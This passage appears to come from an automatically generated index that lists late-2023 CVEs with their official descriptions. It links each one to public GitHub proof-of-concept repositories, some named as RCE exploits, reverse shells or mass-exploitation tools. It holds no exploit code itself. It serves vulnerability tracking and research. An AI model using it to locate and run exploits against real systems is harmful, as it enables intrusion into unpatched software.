+
+- [ersinerenler/CVE-2023-46015-Code-Projects-Blood-Bank-1.0-Reflected-Cross-Site-Scripting-Vulnerability](https://github.com/ersinerenler/CVE-2023-46015-Code-Projects-Blood-Bank-1.0-Reflected-Cross-Site-Scripting-Vulnerability)
+
+### CVE-2023-46016 (2023-11-13)
+
+Cross Site Scripting (XSS) in abs.php in Code-Projects Blood Bank 1.0 allows attackers to run arbitrary code via the 'search' parameter in the application URL.
+
+
+- [ersinerenler/CVE-2023-46016-Code-Projects-Blood-Bank-1.0-Reflected-Cross-Site-Scripting-Vulnerability](https://github.com/ersinerenler/CVE-2023-46016-Code-Projects-Blood-Bank-1.0-Reflected-Cross-Site-Scripting-Vulnerability)
+
+### CVE-2023-46017 (2023-11-13)
+
+SQL Injection vulnerability in receiverLogin.php in Code-Projects Blood Bank 1.0 allows attackers to run arbitrary SQL commands via 'remail' and 'rpassword' parameters.
+
+
+- [ersinerenler/CVE-2023-46017-Code-Projects-Blood-Bank-1.0-SQL-Injection-Vulnerability](https://github.com/ersinerenler/CVE-2023-46017-Code-Projects-Blood-Bank-1.0-SQL-Injection-Vulnerability)
+
+### CVE-2023-46018 (2023-11-13)
+
+SQL injection vulnerability in receiverReg.php in Code-Projects Blood Bank 1.0 \allows attackers to run arbitrary SQL commands via 'remail' parameter.
+
+
+- [ersinerenler/CVE-2023-46018-Code-Projects-Blood-Bank-1.0-SQL-Injection-Vulnerability](https://github.com/ersinerenler/CVE-2023-46018-Code-Projects-Blood-Bank-1.0-SQL-Injection-Vulnerability)
+
+### CVE-2023-46019 (2023-11-13)
+
+Cross Site Scripting (XSS) vulnerability in abs.php in Code-Projects Blood Bank 1.0 allows attackers to run arbitrary code via the 'error' parameter.
+
+
+- [ersinerenler/CVE-2023-46019-Code-Projects-Blood-Bank-1.0-Reflected-Cross-Site-Scripting-Vulnerability](https://github.com/ersinerenler/CVE-2023-46019-Code-Projects-Blood-Bank-1.0-Reflected-Cross-Site-Scripting-Vulnerability)
+
+### CVE-2023-46020 (2023-11-13)
+
+Cross Site Scripting (XSS) in updateprofile.php in Code-Projects Blood Bank 1.0 allows attackers to run arbitrary code via the 'rename', 'remail', 'rphone' and 'rcity' parameters.
+
+
+- [ersinerenler/CVE-2023-46020-Code-Projects-Blood-Bank-1.0-Stored-Cross-Site-Scripting-Vulnerability](https://github.com/ersinerenler/CVE-2023-46020-Code-Projects-Blood-Bank-1.0-Stored-Cross-Site-Scripting-Vulnerability)
+
+### CVE-2023-46021 (2023-11-13)
+
+SQL Injection vulnerability in cancel.php in Code-Projects Blood Bank 1.0 allows attackers to run arbitrary commands via the 'reqid' parameter.
+
+
+- [ersinerenler/CVE-2023-46021-Code-Projects-Blood-Bank-1.0-SQL-Injection-Vulnerability](https://github.com/ersinerenler/CVE-2023-46021-Code-Projects-Blood-Bank-1.0-SQL-Injection-Vulnerability)
+
+### CVE-2023-46022 (2023-11-14)
+
+SQL Injection vulnerability in delete.php in Code-Projects Blood Bank 1.0 allows attackers to run arbitrary SQL commands via the 'bid' parameter.
+
+
+- [ersinerenler/CVE-2023-46022-Code-Projects-Blood-Bank-1.0-OOB-SQL-Injection-Vulnerability](https://github.com/ersinerenler/CVE-2023-46022-Code-Projects-Blood-Bank-1.0-OOB-SQL-Injection-Vulnerability)
+
+### CVE-2023-46197 (2024-05-17)
+
+Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal') vulnerability in supsystic.Com Popup by Supsystic allows Relative Path Traversal.This issue affects Popup by Supsystic: from n/a through 1.10.19.
+
+
+- [RandomRobbieBF/CVE-2023-46197](https://github.com/RandomRobbieBF/CVE-2023-46197)
+
+### CVE-2023-46304 (2024-04-30)
+
+modules/Users/models/Module.php in Vtiger CRM 7.5.0 allows a remote authenticated attacker to run arbitrary PHP code because an unprotected endpoint allows them to write this code to the config.inc.php file (executed on every page load).
+
+
+- [jselliott/CVE-2023-46304](https://github.com/jselliott/CVE-2023-46304)
+
+### CVE-2023-46344 (2024-02-02)
+
+A vulnerability in Solar-Log Base 15 Firmware 6.0.1 Build 161, and possibly other Solar-Log Base products, allows an attacker to escalate their privileges by exploiting a stored cross-site scripting (XSS) vulnerability in the switch group function under /#ilang=DE&b=c_smartenergy_swgroups in the web portal. The vulnerability can be exploited to gain the rights of an installer or PM, which can then be used to gain administrative access to the web portal and execute further attacks.
+
+
+- [vinnie1717/CVE-2023-46344](https://github.com/vinnie1717/CVE-2023-46344)
+
+### CVE-2023-46404 (2023-11-03)
+
+PCRS <= 3.11 (d0de1e) “Questions” page and “Code editor” page are vulnerable to remote code execution (RCE) by escaping Python sandboxing.
+
+
+- [windecks/CVE-2023-46404](https://github.com/windecks/CVE-2023-46404)
+
+### CVE-2023-46442 (-)
+
+An infinite loop in the retrieveActiveBody function of Soot before v4.4.1 under Java 8 allows attackers to cause a Denial of Service (DoS).
+
+
+- [JAckLosingHeart/CVE-2023-46442_POC](https://github.com/JAckLosingHeart/CVE-2023-46442_POC)
+
+### CVE-2023-46449 (2023-10-26)
+
+Sourcecodester Free and Open Source inventory management system v1.0 is vulnerable to Incorrect Access Control. An arbitrary user can change the password of another user and takeover the account via IDOR in the password change function.
+
+
+- [sajaljat/CVE-2023-46449](https://github.com/sajaljat/CVE-2023-46449)
+
+### CVE-2023-46450 (2023-10-26)
+
+Sourcecodester Free and Open Source inventory management system 1.0 is vulnerable to Cross Site Scripting (XSS) via the Add supplier function.
+
+
+- [yte121/-CVE-2023-46450](https://github.com/yte121/-CVE-2023-46450)
+
+### CVE-2023-46451 (2023-10-31)
+
+Best Courier Management System v1.0 is vulnerable to Cross Site Scripting (XSS) in the change username field.
+
+
+- [sajaljat/CVE-2023-46451](https://github.com/sajaljat/CVE-2023-46451)
+
+### CVE-2023-46454 (2023-12-12)
+
+In GL.iNET GL-AR300M routers with firmware v4.3.7, it is possible to inject arbitrary shell commands through a crafted package name in the package information functionality.
+
+
+- [cyberaz0r/GL.iNet-Multiple-Vulnerabilities](https://github.com/cyberaz0r/GL.iNet-Multiple-Vulnerabilities)
+
+### CVE-2023-46474 (2024-01-11)
+
+File Upload vulnerability PMB v.7.4.8 allows a remote attacker to execute arbitrary code and escalate privileges via a crafted PHP file uploaded to the start_import.php file.
+
+
+- [Xn2/CVE-2023-46474](https://github.com/Xn2/CVE-2023-46474)
+
+### CVE-2023-46478 (2023-10-30)
+
+An issue in minCal v.1.0.0 allows a remote attacker to execute arbitrary code via a crafted script to the customer_data parameter.
+
+
+- [mr-xmen786/CVE-2023-46478](https://github.com/mr-xmen786/CVE-2023-46478)
+
+### CVE-2023-46480 (2023-11-27)
+
+An issue in OwnCast v.0.1.1 allows a remote attacker to execute arbitrary code and obtain sensitive information via the authHost parameter of the indieauth function.
+
+
+- [shahzaibak96/CVE-2023-46480](https://github.com/shahzaibak96/CVE-2023-46480)
+
+### CVE-2023-46501 (2023-11-07)
+
+An issue in BoltWire v.6.03 allows a remote attacker to obtain sensitive information via a crafted payload to the view and change admin password function.
+
+
+- [Cyber-Wo0dy/CVE-2023-46501](https://github.com/Cyber-Wo0dy/CVE-2023-46501)
+
+### CVE-2023-46604 (2023-10-27)
+
+The Java OpenWire protocol marshaller is vulnerable to Remote Code \nExecution. This vulnerability may allow a remote attacker with network \naccess to either a Java-based OpenWire broker or client to run arbitrary\n shell commands by manipulating serialized class types in the OpenWire \nprotocol to cause either the client or the broker (respectively) to \ninstantiate any class on the classpath.\n\nUsers are recommended to upgrade\n both brokers and clients to version 5.15.16, 5.16.7, 5.17.6, or 5.18.3 \nwhich fixes this issue.\n\n
+
+
+- [trganda/ActiveMQ-RCE](https://github.com/trganda/ActiveMQ-RCE)
+- [X1r0z/ActiveMQ-RCE](https://github.com/X1r0z/ActiveMQ-RCE)
+- [JaneMandy/ActiveMQ_RCE_Pro_Max](https://github.com/JaneMandy/ActiveMQ_RCE_Pro_Max)
+- [SaumyajeetDas/CVE-2023-46604-RCE-Reverse-Shell-Apache-ActiveMQ](https://github.com/SaumyajeetDas/CVE-2023-46604-RCE-Reverse-Shell-Apache-ActiveMQ)
+- [evkl1d/CVE-2023-46604](https://github.com/evkl1d/CVE-2023-46604)
+- [sule01u/CVE-2023-46604](https://github.com/sule01u/CVE-2023-46604)
+- [justdoit-cai/CVE-2023-46604-Apache-ActiveMQ-RCE-exp](https://github.com/justdoit-cai/CVE-2023-46604-Apache-ActiveMQ-RCE-exp)
+- [h3x3h0g/ActiveMQ-RCE-CVE-2023-46604-Write-up](https://github.com/h3x3h0g/ActiveMQ-RCE-CVE-2023-46604-Write-up)
+- [duck-sec/CVE-2023-46604-ActiveMQ-RCE-pseudoshell](https://github.com/duck-sec/CVE-2023-46604-ActiveMQ-RCE-pseudoshell)
+- [vjayant93/CVE-2023-46604-POC](https://github.com/vjayant93/CVE-2023-46604-POC)
+- [LiritoShawshark/CVE-2023-46604_ActiveMQ_RCE_Recurrence](https://github.com/LiritoShawshark/CVE-2023-46604_ActiveMQ_RCE_Recurrence)
+- [NKeshawarz/CVE-2023-46604-RCE](https://github.com/NKeshawarz/CVE-2023-46604-RCE)
+- [minhangxiaohui/ActiveMQ_CVE-2023-46604](https://github.com/minhangxiaohui/ActiveMQ_CVE-2023-46604)
+- [nitzanoligo/CVE-2023-46604-demo](https://github.com/nitzanoligo/CVE-2023-46604-demo)
+- [tomasmussi-mulesoft/activemq-cve-2023-46604](https://github.com/tomasmussi-mulesoft/activemq-cve-2023-46604)
+- [dcm2406/CVE-Lab](https://github.com/dcm2406/CVE-Lab)
+- [mrpentst/CVE-2023-46604](https://github.com/mrpentst/CVE-2023-46604)
+- [dcm2406/CVE-2023-46604](https://github.com/dcm2406/CVE-2023-46604)
+- [Mudoleto/Broker_ApacheMQ](https://github.com/Mudoleto/Broker_ApacheMQ)
+- [hh-hunter/cve-2023-46604](https://github.com/hh-hunter/cve-2023-46604)
+- [ST3G4N05/ExploitScript-CVE-2023-46604](https://github.com/ST3G4N05/ExploitScript-CVE-2023-46604)
+- [Arlenhiack/ActiveMQ-RCE-Exploit](https://github.com/Arlenhiack/ActiveMQ-RCE-Exploit)
+- [vulncheck-oss/cve-2023-46604](https://github.com/vulncheck-oss/cve-2023-46604)
+- [thinkycx/activemq-rce-cve-2023-46604](https://github.com/thinkycx/activemq-rce-cve-2023-46604)
+- [mranv/honeypot.rs](https://github.com/mranv/honeypot.rs)
+- [pulentoski/CVE-2023-46604](https://github.com/pulentoski/CVE-2023-46604)
+
+### CVE-2023-46615 (2024-02-12)
+
+Deserialization of Untrusted Data vulnerability in Kalli Dan. KD Coming Soon.This issue affects KD Coming Soon: from n/a through 1.7.\n\n
+
+
+- [RandomRobbieBF/CVE-2023-46615](https://github.com/RandomRobbieBF/CVE-2023-46615)
+
+### CVE-2023-46694 (-)
+
+Vtenext 21.02 allows an authenticated attacker to upload arbitrary files, potentially enabling them to execute remote commands. This flaw exists due to the application's failure to enforce proper authentication controls when accessing the Ckeditor file manager functionality.
+
+
+- [invisiblebyte/CVE-2023-46694](https://github.com/invisiblebyte/CVE-2023-46694)
+
+### CVE-2023-46747 (2023-10-26)
+
+\n\n\nUndisclosed requests may bypass configuration utility authentication, allowing an attacker with network access to the BIG-IP system through the management port and/or self IP addresses to execute arbitrary system commands. Note: Software versions which have reached End of Technical Support (EoTS) are not evaluated\n\n
+
+
+- [bijaysenihang/CVE-2023-46747-Mass-RCE](https://github.com/bijaysenihang/CVE-2023-46747-Mass-RCE)
+- [W01fh4cker/CVE-2023-46747-RCE](https://github.com/W01fh4cker/CVE-2023-46747-RCE)
+- [fu2x2000/CVE-2023-46747](https://github.com/fu2x2000/CVE-2023-46747)
+- [maniak-academy/Mitigate-CVE-2023-46747](https://github.com/maniak-academy/Mitigate-CVE-2023-46747)
+- [y4v4z/CVE-2023-46747-POC](https://github.com/y4v4z/CVE-2023-46747-POC)
+- [nvansluis/test_cve-2023-46747](https://github.com/nvansluis/test_cve-2023-46747)
+- [RevoltSecurities/CVE-2023-46747](https://github.com/RevoltSecurities/CVE-2023-46747)
+- [vidura2/cve-2023-46747](https://github.com/vidura2/cve-2023-46747)
+- [rainbowhatrkn/CVE-2023-46747-RCE](https://github.com/rainbowhatrkn/CVE-2023-46747-RCE)
+
+### CVE-2023-46805 (2024-01-12)
+
+An authentication bypass vulnerability in the web component of Ivanti ICS 9.x, 22.x and Ivanti Policy Secure allows a remote attacker to access restricted resources by bypassing control checks.
+
+
+- [yoryio/CVE-2023-46805](https://github.com/yoryio/CVE-2023-46805)
+- [cbeek-r7/CVE-2023-46805](https://github.com/cbeek-r7/CVE-2023-46805)
+- [duy-31/CVE-2023-46805_CVE-2024-21887](https://github.com/duy-31/CVE-2023-46805_CVE-2024-21887)
+- [raminkarimkhani1996/CVE-2023-46805_CVE-2024-21887](https://github.com/raminkarimkhani1996/CVE-2023-46805_CVE-2024-21887)
+- [seajaysec/Ivanti-Connect-Around-Scan](https://github.com/seajaysec/Ivanti-Connect-Around-Scan)
+- [Chocapikk/CVE-2023-46805](https://github.com/Chocapikk/CVE-2023-46805)
+- [mickdec/CVE-2023-46805_CVE-2024-21887_scan_grouped](https://github.com/mickdec/CVE-2023-46805_CVE-2024-21887_scan_grouped)
+- [w2xim3/CVE-2023-46805](https://github.com/w2xim3/CVE-2023-46805)
+
+### CVE-2023-46865 (2023-10-30)
+
+/api/v1/company/upload-logo in CompanyController.php in crater through 6.0.6 allows a superadmin to execute arbitrary PHP code by placing this code into an image/png IDAT chunk of a Company Logo image.
+
+
+- [asylumdx/Crater-CVE-2023-46865-RCE](https://github.com/asylumdx/Crater-CVE-2023-46865-RCE)
+
+### CVE-2023-46870 (-)
+
+extcap/nrf_sniffer_ble.py, extcap/nrf_sniffer_ble.sh, extcap/SnifferAPI/*.py in Nordic Semiconductor nRF Sniffer for Bluetooth LE 3.0.0, 3.1.0, 4.0.0, 4.1.0, and 4.1.1 have set incorrect file permission, which allows attackers to do code execution via modified bash and python scripts.
+
+
+- [Chapoly1305/CVE-2023-46870](https://github.com/Chapoly1305/CVE-2023-46870)
+
+### CVE-2023-46918 (2023-12-27)
+
+Phlox com.phlox.simpleserver.plus (aka Simple HTTP Server PLUS) 1.8.1-plus has an Android manifest file that contains an entry with the android:allowBackup attribute set to true. This could be leveraged by an attacker with physical access to the device.
+
+
+- [actuator/com.phlox.simpleserver](https://github.com/actuator/com.phlox.simpleserver)
+
+### CVE-2023-46948
+- [AzraelsBlade/CVE-2023-46948](https://github.com/AzraelsBlade/CVE-2023-46948)
+
+### CVE-2023-46954 (2023-11-03)
+
+SQL Injection vulnerability in Relativity ODA LLC RelativityOne v.12.1.537.3 Patch 2 and earlier allows a remote attacker to execute arbitrary code via the name parameter.
+
+
+- [jakedmurphy1/CVE-2023-46954](https://github.com/jakedmurphy1/CVE-2023-46954)
+
+### CVE-2023-46974 (2023-12-07)
+
+Cross Site Scripting vulnerability in Best Courier Management System v.1.000 allows a remote attacker to execute arbitrary code via a crafted payload to the page parameter in the URL.
+
+
+- [yte121/CVE-2023-46974](https://github.com/yte121/CVE-2023-46974)
+
+### CVE-2023-46980 (2023-11-03)
+
+An issue in Best Courier Management System v.1.0 allows a remote attacker to execute arbitrary code and escalate privileges via a crafted script to the userID parameter.
+
+
+- [sajaljat/CVE-2023-46980](https://github.com/sajaljat/CVE-2023-46980)
+
+### CVE-2023-46998 (2023-11-07)
+
+Cross Site Scripting vulnerability in BootBox Bootbox.js v.3.2 through 6.0 allows a remote attacker to execute arbitrary code via a crafted payload to alert(), confirm(), prompt() functions.
+
+
+- [soy-oreocato/CVE-2023-46998](https://github.com/soy-oreocato/CVE-2023-46998)
+
+### CVE-2023-47014 (2023-11-22)
+
+A Cross-Site Request Forgery (CSRF) vulnerability in Sourcecodester Sticky Notes App Using PHP with Source Code v.1.0 allows a local attacker to obtain sensitive information via a crafted payload to add-note.php.
+
+
+- [emirhanerdogu/CVE-2023-47014-Sticky-Notes-App-Using-PHP-with-Source-Code-v1.0-CSRF-to-CORS](https://github.com/emirhanerdogu/CVE-2023-47014-Sticky-Notes-App-Using-PHP-with-Source-Code-v1.0-CSRF-to-CORS)
+
+### CVE-2023-47102 (2023-11-07)
+
+UrBackup Server 2.5.31 allows brute-force enumeration of user accounts because a failure message confirms that a username is not valid.
+
+
+- [quantiano/cve-2023-47102](https://github.com/quantiano/cve-2023-47102)
+- [nitipoom-jar/CVE-2023-47102](https://github.com/nitipoom-jar/CVE-2023-47102)
+
+### CVE-2023-47108 (2023-11-10)
+
+OpenTelemetry-Go Contrib is a collection of third-party packages for OpenTelemetry-Go. Prior to version 0.46.0, the grpc Unary Server Interceptor out of the box adds labels `net.peer.sock.addr` and `net.peer.sock.port` that have unbound cardinality. It leads to the server's potential memory exhaustion when many malicious requests are sent. An attacker can easily flood the peer address and port for requests. Version 0.46.0 contains a fix for this issue. As a workaround to stop being affected, a view removing the attributes can be used. The other possibility is to disable grpc metrics instrumentation by passing `otelgrpc.WithMeterProvider` option with `noop.NewMeterProvider`.
+
+
+- [bahe-msft/govuln-CVE-2023-47108](https://github.com/bahe-msft/govuln-CVE-2023-47108)
+
+### CVE-2023-47119 (2023-11-10)
+
+Discourse is an open source platform for community discussion. Prior to version 3.1.3 of the `stable` branch and version 3.2.0.beta3 of the `beta` and `tests-passed` branches, some links can inject arbitrary HTML tags when rendered through our Onebox engine. The issue is patched in version 3.1.3 of the `stable` branch and version 3.2.0.beta3 of the `beta` and `tests-passed` branches. There are no known workarounds.
+
+
+- [BaadMaro/CVE-2023-47119](https://github.com/BaadMaro/CVE-2023-47119)
+- [Cristiano100/CVE-2023-47119](https://github.com/Cristiano100/CVE-2023-47119)
+
+### CVE-2023-47129 (2023-11-10)
+
+Statmic is a core Laravel content management system Composer package. Prior to versions 3.4.13 and 4.33.0, on front-end forms with an asset upload field, PHP files crafted to look like images may be uploaded. This only affects forms using the "Forms" feature and not just _any_ arbitrary form. This does not affect the control panel. This issue has been patched in 3.4.13 and 4.33.0.\n
+
+
+- [Cyber-Wo0dy/CVE-2023-47129](https://github.com/Cyber-Wo0dy/CVE-2023-47129)
+
+### CVE-2023-47179
+- [RandomRobbieBF/CVE-2023-47179](https://github.com/RandomRobbieBF/CVE-2023-47179)
+
+### CVE-2023-47218 (2024-02-13)
+
+An OS command injection vulnerability has been reported to affect several QNAP operating system versions. If exploited, the vulnerability could allow users to execute commands via a network.\n\nWe have already fixed the vulnerability in the following versions:\nQTS 5.1.5.2645 build 20240116 and later\nQuTS hero h5.1.5.2647 build 20240118 and later\nQuTScloud c5.1.5.2651 and later\n
+
+
+- [passwa11/CVE-2023-47218](https://github.com/passwa11/CVE-2023-47218)
+
+### CVE-2023-47246 (2023-11-10)
+
+In SysAid On-Premise before 23.3.36, a path traversal vulnerability leads to code execution after an attacker writes a file to the Tomcat webroot, as exploited in the wild in November 2023.
+
+
+- [W01fh4cker/CVE-2023-47246-EXP](https://github.com/W01fh4cker/CVE-2023-47246-EXP)
+- [rainbowhatrkn/CVE-2023-47246](https://github.com/rainbowhatrkn/CVE-2023-47246)
+- [tucommenceapousser/CVE-2023-47246](https://github.com/tucommenceapousser/CVE-2023-47246)
+
+### CVE-2023-47355 (2024-02-05)
+
+The com.eypcnnapps.quickreboot (aka Eyuep Can Yilmaz {ROOT] Quick Reboot) application 1.0.8 for Android has exposed broadcast receivers for PowerOff, Reboot, and Recovery (e.g., com.eypcnnapps.quickreboot.widget.PowerOff) that are susceptible to unauthorized broadcasts because of missing input validation.
+
+
+- [actuator/com.eypcnnapps.quickreboot](https://github.com/actuator/com.eypcnnapps.quickreboot)
+
+### CVE-2023-47400
+- [LucasVanHaaren/CVE-2023-47400](https://github.com/LucasVanHaaren/CVE-2023-47400)
+
+### CVE-2023-47437 (2023-11-27)
+
+A vulnerability has been identified in Pachno 1.0.6 allowing an authenticated attacker to execute a cross-site scripting (XSS) attack. The vulnerability exists due to inadequate input validation in the Project Description and comments, which enables an attacker to inject malicious java script.
+
+
+- [herombey/CVE-2023-47437](https://github.com/herombey/CVE-2023-47437)
+
+### CVE-2023-47459 (2024-01-16)
+
+An issue in Knovos Discovery v.22.67.0 allows a remote attacker to obtain sensitive information via the /DiscoveryReview/Service/CaseManagement.svc/GetProductSiteName component.
+
+
+- [aleksey-vi/CVE-2023-47459](https://github.com/aleksey-vi/CVE-2023-47459)
+
+### CVE-2023-47460 (2024-01-16)
+
+SQL injection vulnerability in Knovos Discovery v.22.67.0 allows a remote attacker to execute arbitrary code via the /DiscoveryProcess/Service/Admin.svc/getGridColumnStructure component.
+
+
+- [aleksey-vi/CVE-2023-47460](https://github.com/aleksey-vi/CVE-2023-47460)
+
+### CVE-2023-47464 (2023-11-30)
+
+Insecure Permissions vulnerability in GL.iNet AX1800 version 4.0.0 before 4.5.0 allows a remote attacker to execute arbitrary code via the upload API function.
+
+
+- [HadessCS/CVE-2023-47464](https://github.com/HadessCS/CVE-2023-47464)
+
+### CVE-2023-47488 (2023-11-09)
+
+Cross Site Scripting vulnerability in Combodo iTop v.3.1.0-2-11973 allows a local attacker to obtain sensitive information via a crafted script to the attrib_manager_id parameter in the General Information page and the id parameter in the contact page.
+
+
+- [nitipoom-jar/CVE-2023-47488](https://github.com/nitipoom-jar/CVE-2023-47488)
+
+### CVE-2023-47489 (2023-11-09)
+
+CSV injection in export as csv in Combodo iTop v.3.1.0-2-11973 allows a local attacker to execute arbitrary code via a crafted script to the export-v2.php and ajax.render.php components.
+
+
+- [nitipoom-jar/CVE-2023-47489](https://github.com/nitipoom-jar/CVE-2023-47489)
+
+### CVE-2023-47504 (2024-04-24)
+
+Improper Authentication vulnerability in Elementor Elementor Website Builder allows Accessing Functionality Not Properly Constrained by ACLs.This issue affects Elementor Website Builder: from n/a through 3.16.4.\n\n
+
+
+- [davidxbors/CVE-2023-47504-POC](https://github.com/davidxbors/CVE-2023-47504-POC)
+
+### CVE-2023-47529 (2023-11-23)
+
+Exposure of Sensitive Information to an Unauthorized Actor vulnerability in ThemeIsle Cloud Templates & Patterns collection.This issue affects Cloud Templates & Patterns collection: from n/a through 1.2.2.\n\n
+
+
+- [RandomRobbieBF/CVE-2023-47529](https://github.com/RandomRobbieBF/CVE-2023-47529)
+
+### CVE-2023-47564 (2024-02-02)
+
+An incorrect permission assignment for critical resource vulnerability has been reported to affect Qsync Central. If exploited, the vulnerability could allow authenticated users to read or modify the resource via a network.\n\nWe have already fixed the vulnerability in the following versions:\nQsync Central 4.4.0.15 ( 2024/01/04 ) and later\nQsync Central 4.3.0.11 ( 2024/01/11 ) and later\n
+
+
+- [C411e/CVE-2023-47564](https://github.com/C411e/CVE-2023-47564)
+
+### CVE-2023-47668 (2023-11-23)
+
+Exposure of Sensitive Information to an Unauthorized Actor vulnerability in StellarWP Membership Plugin – Restrict Content plugin <= 3.2.7 versions.
+
+
+- [RandomRobbieBF/CVE-2023-47668](https://github.com/RandomRobbieBF/CVE-2023-47668)
+
+### CVE-2023-47840 (2023-12-29)
+
+Improper Control of Generation of Code ('Code Injection') vulnerability in Qode Interactive Qode Essential Addons.This issue affects Qode Essential Addons: from n/a through 1.5.2.\n\n
+
+
+- [RandomRobbieBF/CVE-2023-47840](https://github.com/RandomRobbieBF/CVE-2023-47840)
+
+### CVE-2023-47882 (2023-12-27)
+
+The Kami Vision YI IoT com.yunyi.smartcamera application through 4.1.9_20231127 for Android allows a remote attacker to execute arbitrary JavaScript code via an implicit intent to the com.ants360.yicamera.activity.WebViewActivity component.
+
+
+- [actuator/yi](https://github.com/actuator/yi)
+
+### CVE-2023-47883 (2023-12-27)
+
+The com.altamirano.fabricio.tvbrowser TV browser application through 4.5.1 for Android is vulnerable to JavaScript code execution via an explicit intent due to an exposed MainActivity.
+
+
+- [actuator/com.altamirano.fabricio.tvbrowser](https://github.com/actuator/com.altamirano.fabricio.tvbrowser)
+
+### CVE-2023-47889 (2024-02-06)
+
+The Android application BINHDRM26 com.bdrm.superreboot 1.0.3, exposes several critical actions through its exported broadcast receivers. These exposed actions can allow any app on the device to send unauthorized broadcasts, leading to unintended consequences. The vulnerability is particularly concerning because these actions include powering off, system reboot & entering recovery mode.
+
+
+- [actuator/com.bdrm.superreboot](https://github.com/actuator/com.bdrm.superreboot)
+
+### CVE-2023-48022 (2023-11-28)
+
+Anyscale Ray 2.6.3 and 2.8.0 allows a remote attacker to execute arbitrary code via the job submission API. NOTE: the vendor's position is that this report is irrelevant because Ray, as stated in its documentation, is not intended for use outside of a strictly controlled network environment
+
+
+- [0x656565/CVE-2023-48022](https://github.com/0x656565/CVE-2023-48022)
+- [jakabakos/ShadowRay-RCE-PoC-CVE-2023-48022](https://github.com/jakabakos/ShadowRay-RCE-PoC-CVE-2023-48022)
+
+### CVE-2023-48028 (2023-11-17)
+
+kodbox 1.46.01 has a security flaw that enables user enumeration. This problem is present on the login page, where an attacker can identify valid users based on varying response messages, potentially paving the way for a brute force attack.
+
+
+- [nitipoom-jar/CVE-2023-48028](https://github.com/nitipoom-jar/CVE-2023-48028)
+
+### CVE-2023-48029 (2023-11-17)
+
+Corebos 8.0 and below is vulnerable to CSV Injection. An attacker with low privileges can inject a malicious command into a table. This vulnerability is exploited when an administrator visits the user management section, exports the data to a CSV file, and then opens it, leading to the execution of the malicious payload on the administrator's computer.
+
+
+- [nitipoom-jar/CVE-2023-48029](https://github.com/nitipoom-jar/CVE-2023-48029)
+
+### CVE-2023-48031 (2023-11-17)
+
+OpenSupports v4.11.0 is vulnerable to Unrestricted Upload of File with Dangerous Type. In the comment function, an attacker can bypass security restrictions and upload a .bat file by manipulating the file's magic bytes to masquerade as an allowed type. This can enable the attacker to execute arbitrary code or establish a reverse shell, leading to unauthorized file writes or control over the victim's station via a crafted file upload operation.
+
+
+- [nitipoom-jar/CVE-2023-48031](https://github.com/nitipoom-jar/CVE-2023-48031)
+
+### CVE-2023-48034 (2023-11-27)
+
+An issue discovered in Acer Wireless Keyboard SK-9662 allows attacker in physical proximity to both decrypt wireless keystrokes and inject arbitrary keystrokes via use of weak encryption.
+
+
+- [aprkr/CVE-2023-48034](https://github.com/aprkr/CVE-2023-48034)
+
+### CVE-2023-48084 (2023-12-14)
+
+Nagios XI before version 5.11.3 was discovered to contain a SQL injection vulnerability via the bulk modification tool.
+
+
+- [Hamibubu/CVE-2023-48084](https://github.com/Hamibubu/CVE-2023-48084)
+- [bucketcat/CVE-2023-48084](https://github.com/bucketcat/CVE-2023-48084)
+
+### CVE-2023-48104 (2024-01-16)
+
+Alinto SOGo before 5.9.1 is vulnerable to HTML Injection.
+
+
+- [E1tex/CVE-2023-48104](https://github.com/E1tex/CVE-2023-48104)
+
+### CVE-2023-48123 (2023-12-06)
+
+An issue in Netgate pfSense Plus v.23.05.1 and before and pfSense CE v.2.7.0 allows a remote attacker to execute arbitrary code via a crafted request to the packet_capture.php file.
+
+
+- [NHPT/CVE-2023-48123](https://github.com/NHPT/CVE-2023-48123)
+
+### CVE-2023-48197 (2023-11-15)
+
+Cross-Site Scripting (XSS) vulnerability in the ‘manageApiKeys’ component of Grocy 4.0.3 and earlier allows attackers to obtain victim's cookies when the victim clicks on the "see QR code" function.
+
+
+- [nitipoom-jar/CVE-2023-48197](https://github.com/nitipoom-jar/CVE-2023-48197)
+
+### CVE-2023-48198 (2023-11-15)
+
+A Cross-Site Scripting (XSS) vulnerability in the 'product description' component within '/api/stock/products' of Grocy version <= 4.0.3 allows attackers to obtain a victim's cookies.
+
+
+- [nitipoom-jar/CVE-2023-48198](https://github.com/nitipoom-jar/CVE-2023-48198)
+
+### CVE-2023-48199 (2023-11-15)
+
+HTML Injection vulnerability in the 'manageApiKeys' component in Grocy <= 4.0.3 allows attackers to inject arbitrary HTML content without script execution. This occurs when user-supplied data is not appropriately sanitized, enabling the injection of HTML tags through parameter values. The attacker can then manipulate page content in the QR code detail popup, often coupled with social engineering tactics, exploiting both the trust of users and the application's lack of proper input handling.
+
+
+- [nitipoom-jar/CVE-2023-48199](https://github.com/nitipoom-jar/CVE-2023-48199)
+
+### CVE-2023-48200 (2023-11-15)
+
+Cross Site Scripting vulnerability in Grocy v.4.0.3 allows a local attacker to execute arbitrary code and obtain sensitive information via the equipment description component within /equipment/ component.
+
+
+- [nitipoom-jar/CVE-2023-48200](https://github.com/nitipoom-jar/CVE-2023-48200)
+
+### CVE-2023-48777 (2024-03-26)
+
+Unrestricted Upload of File with Dangerous Type vulnerability in Elementor.Com Elementor Website Builder.This issue affects Elementor Website Builder: from 3.3.0 through 3.18.1.\n\n
+
+
+- [AkuCyberSec/Elementor-3.18.0-Upload-Path-Traversal-RCE-CVE-2023-48777](https://github.com/AkuCyberSec/Elementor-3.18.0-Upload-Path-Traversal-RCE-CVE-2023-48777)
+
+### CVE-2023-48788 (2024-03-12)
+
+A improper neutralization of special elements used in an sql command ('sql injection') in Fortinet FortiClientEMS version 7.2.0 through 7.2.2, FortiClientEMS 7.0.1 through 7.0.10 allows attacker to execute unauthorized code or commands via specially crafted packets.
+
+
+- [horizon3ai/CVE-2023-48788](https://github.com/horizon3ai/CVE-2023-48788)
+
+### CVE-2023-48842 (2023-12-01)
+
+D-Link Go-RT-AC750 revA_v101b03 was discovered to contain a command injection vulnerability via the service parameter at hedwig.cgi.
+
+
+- [creacitysec/CVE-2023-48842](https://github.com/creacitysec/CVE-2023-48842)
+
+### CVE-2023-48849 (2023-12-06)
+
+Ruijie EG Series Routers version EG_3.0(1)B11P216 and before allows unauthenticated attackers to remotely execute arbitrary code due to incorrect filtering.
+
+
+- [delsploit/CVE-2023-48849](https://github.com/delsploit/CVE-2023-48849)
+
+### CVE-2023-48858 (2024-01-17)
+
